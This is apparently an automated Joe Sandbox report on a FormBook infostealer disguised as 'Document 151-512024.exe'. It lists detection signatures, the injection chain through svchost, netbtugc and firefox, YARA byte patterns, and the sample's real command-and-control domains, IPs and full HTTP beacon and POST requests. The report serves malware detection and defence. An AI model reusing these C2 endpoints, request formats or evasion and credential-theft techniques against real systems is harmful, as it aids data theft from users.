Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document 151-512024.exe

Overview

General Information

Sample name:Document 151-512024.exe
Analysis ID:1438042
MD5:8e009a43143d3afdde5e91b311e4018b
SHA1:332f1f946b6aaadecb3de55c5880d0c61021073f
SHA256:75cdc03e89729226eaefb9259aab9beb4052ddef0280bbf53dcaf8ef9f58d917
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Document 151-512024.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\Document 151-512024.exe" MD5: 8E009A43143D3AFDDE5E91B311E4018B)
    • svchost.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\Document 151-512024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • dZxfFeGGZbzJaFRaN.exe (PID: 6764 cmdline: "C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7976 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • dZxfFeGGZbzJaFRaN.exe (PID: 1816 cmdline: "C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7296 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ParentImage: C:\Users\user\Desktop\Document 151-512024.exe, ParentProcessId: 7456, ParentProcessName: Document 151-512024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ProcessId: 7512, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ParentImage: C:\Users\user\Desktop\Document 151-512024.exe, ParentProcessId: 7456, ParentProcessName: Document 151-512024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Document 151-512024.exe", ProcessId: 7512, ProcessName: svchost.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.kasegitai.tokyo/fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8TchAvira URL Cloud: Label: malware
            Source: http://www.empowermedeco.comAvira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.empowermedeco.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.kasegitai.tokyo/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.660danm.top/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A==Avira URL Cloud: Label: malware
            Source: http://www.magmadokum.com/fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ==Avira URL Cloud: Label: malware
            Source: http://www.magmadokum.com/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8TchAvira URL Cloud: Label: malware
            Source: http://www.660danm.top/fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ==Avira URL Cloud: Label: malware
            Source: https://www.empowermedeco.com/fo8o/?FBEd=mxnRAvira URL Cloud: Label: malware
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: phishing
            Source: Document 151-512024.exeReversingLabs: Detection: 63%
            Source: Document 151-512024.exeVirustotal: Detection: 61%Perma Link
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Document 151-512024.exeJoe Sandbox ML: detected
            Source: Document 151-512024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3689713194.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3689548451.0000000000BEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Document 151-512024.exe, 00000000.00000003.1222502312.0000000003860000.00000004.00001000.00020000.00000000.sdmp, Document 151-512024.exe, 00000000.00000003.1223460110.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1278781455.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1393001224.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1275345083.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000003.1396093652.000000000321A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.000000000355E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3691575499.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1393025365.000000000306C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000A.00000002.3692885046.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000274C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1686439407.000000000E69C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1392801027.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344247546.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 00000009.00000002.3688580630.00000000004B8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009ADBBE
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0097C2A2 FindFirstFileExW,0_2_0097C2A2
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B68EE FindFirstFileW,FindClose,0_2_009B68EE
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009B698F
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009AD076
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009AD3A9
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009B9642
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009B979D
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009B9B2B
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009B5C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1BAB0 FindFirstFileW,FindNextFileW,FindClose,10_2_02C1BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax10_2_02C09480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi10_2_02C0DD45

            Networking

            barindex
            Source: DNS query: www.joyesi.xyz
            Source: unknownNetwork traffic detected: IP country count 11
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009BCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_009BCE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZbzJQ+JklL0Sj0639iiSTIgkj8wGO6A==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMRwjYf1n6/EmRSSw2BgpSj1BbNsbEQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FBEd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hbvgW/E7EGitLXVKOGZWUueXafmCZ6g==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 193Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 46 42 45 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 45 72 63 2b 68 39 51 77 70 59 45 4b 41 6b 77 46 52 65 6f 66 48 4b 34 78 55 42 50 Data Ascii: 